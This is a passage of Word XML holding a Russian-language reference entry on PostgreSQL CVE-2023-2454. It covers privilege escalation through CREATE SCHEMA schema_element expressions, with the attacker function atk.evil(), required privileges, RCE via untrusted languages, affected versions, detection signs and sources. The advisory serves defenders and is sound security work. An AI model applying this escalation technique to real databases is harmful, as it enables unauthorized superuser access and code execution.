        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955EB38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительный эффект: даже при отсутствии немедленного triggering — DEFAULT-выражение исполнится при первом INSERT в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (что admin или другая привилегированная роль может сделать впоследствии, например через тестовые seed-скрипты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702DBB4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL применяет защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к большинству DDL-операций, чтобы предотвратить hijack функций через подмену объектов в user-schemas (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Этот механизм называется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secure search_path enforcement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и работает для большинства DDL. До CVE-2023-2454 enforcement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">не покрывал schema_element-формы CREATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SCHEMA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для них использовался search_path вызывающей роли, а expressions с полностью-квалифицированными именами (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t>) обходили любую защиту через search_path, потому что квалификация имени делает search_path нерелевантным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257771D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фикс — расширение SRO-sandbox на schema_element expressions и проверка ownership функций, вызываемых из DDL под привилегированной ролью. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/commands/schemacmds.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CreateSchemaCommand</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256D1C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA40CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≤ 15.2, 14.7, 13.10, 12.14, 11.19. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Фикс:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.3, 14.8, 13.11, 12.15, 11.20 (выпущены 11 мая 2023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F547780" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679357A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CREATE на БД (для создания собственной схемы atk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63056A33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CREATE FUNCTION в схеме atk (выдается автоматически owner-у схемы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C82168" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B68EC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790A676" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   admin, выполняющий CREATE SCHEMA с user-controlled schema_element (типично superuser или владелец БД)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634ED6DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   в реалистичном сценарии — DBA-tool, multi-tenant onboarding, схема-init template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62956F2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atk.evil() может использовать любой язык — plpgsql (для эскалации без RCE), plperlu/plpython3u (для прямого RCE если установлены).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D695C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C758A"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2B2B903B"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2761A35"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7D82C63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="51573C0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48FF1A"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6F4FDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-2454</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5ADFF685"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A5DC17"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F91D25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3ED7995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01439A"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B4B62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11 мая 2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0B9E5E45"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215A11"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892D5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 15.2, 14.7, 13.10, 12.14, 11.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="667A4A2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933EDA"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DF1D78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 15.3, 14.8, 13.11, 12.15, 11.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7C0BE4F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7A9D0A"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E78CA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SRO-sandbox bypass в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CREATE SCHEMA ... schema_element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="59D26773"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5BD30F"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BCE60E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege escalation от CREATE-on-DB до superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77D781BD"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CREATE SCHEMA ... CREATE TABLE ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный паттерн для atomic schema-bootstrap, используется в:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21991D22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   multi-tenant onboarding-скриптах (типично admin создаёт схему tenant_X с typed-tables за один DDL-statement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF635E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   database migration tools (Liquibase, Flyway, Alembic могут генерировать такой SQL для full schema setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593C19A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   test-fixtures (pytest-postgresql, factory-boy создают чистую схему для каждого теста)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076EA1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D004B13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pP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ddl_command_start</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ddl_command_end</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для CREATE SCHEMA с filter по schema_element, содержащему вызовы функций из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не-системных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> схем (не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Это статический сканер: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema_element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не должен ссылаться на функции из user-schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D115C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t>-выводе: новые DEFAULT-выражения, ссылающиеся на функции из чужих owner-ов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для DEFAULT в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_*.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> таблицах).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9FE11E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   В audit-логах: CREATE SCHEMA от superuser, где payload содержит подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;schema&gt;.&lt;func&gt;()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с schema не равной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_&lt;X&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или другой ожидаемой).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C2EE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   На версиях PG ≤ 15.2 / 14.7 / 13.10 / 12.14 / 11.19 — все CREATE SCHEMA с user-controlled schema_element стоит ревьюить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F099F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки PG до фикса 11.05.2023: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495188E9"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74F0267" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>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D1BFE50"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5F8152E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7771BFB2"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FE2E95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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4DDF19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.2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749B2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3F816B51"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D41243"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CD8542" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.7</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7E048D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2B455A50"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FED0F3"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A2E1E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.10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C13CC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5E923BB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6757F"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F65915" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.14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C47390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="540ABD3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0ADF89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.x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2E59BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.19</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35B919" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.20 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B09A53F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На версиях PG ≥ 15.3 / 14.8 / 13.11 / 12.15 / 11.20 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — schema_element expressions выполняются в SRO-sandbox, ссылки на user-defined функции из других owner-ов блокированы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15398D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DC3FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий механизм защиты от schema-hijack. Та же угроза, но в другом контексте (вызов SECURITY DEFINER функции вместо schema_element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364C529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4 Extension scripts CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой путь подмены объекта в admin-DDL. Граница: 3.13.4 — подмена через CREATE EXTENSION; 3.13.2 — подмена через CREATE SCHEMA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC8039" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальные RCE-векторы, к которым эскалирует CVE-2023-2454 (если atk.evil() использует untrusted PL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFFEBBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанный класс уязвимостей по неполной квалификации имён в DDL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77039430" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 (Хронология 2023)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст 11.05.2023 fixes (CVE-2023-2454, CVE-2023-2455).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58F03E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72056FA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2023-2454 — https://www.postgresql.org/support/security/CVE-2023-2454/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55989662" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   cve.news разбор CVE-2023-2454 — https://www.cve.news/cve-2023-2454/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE033E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
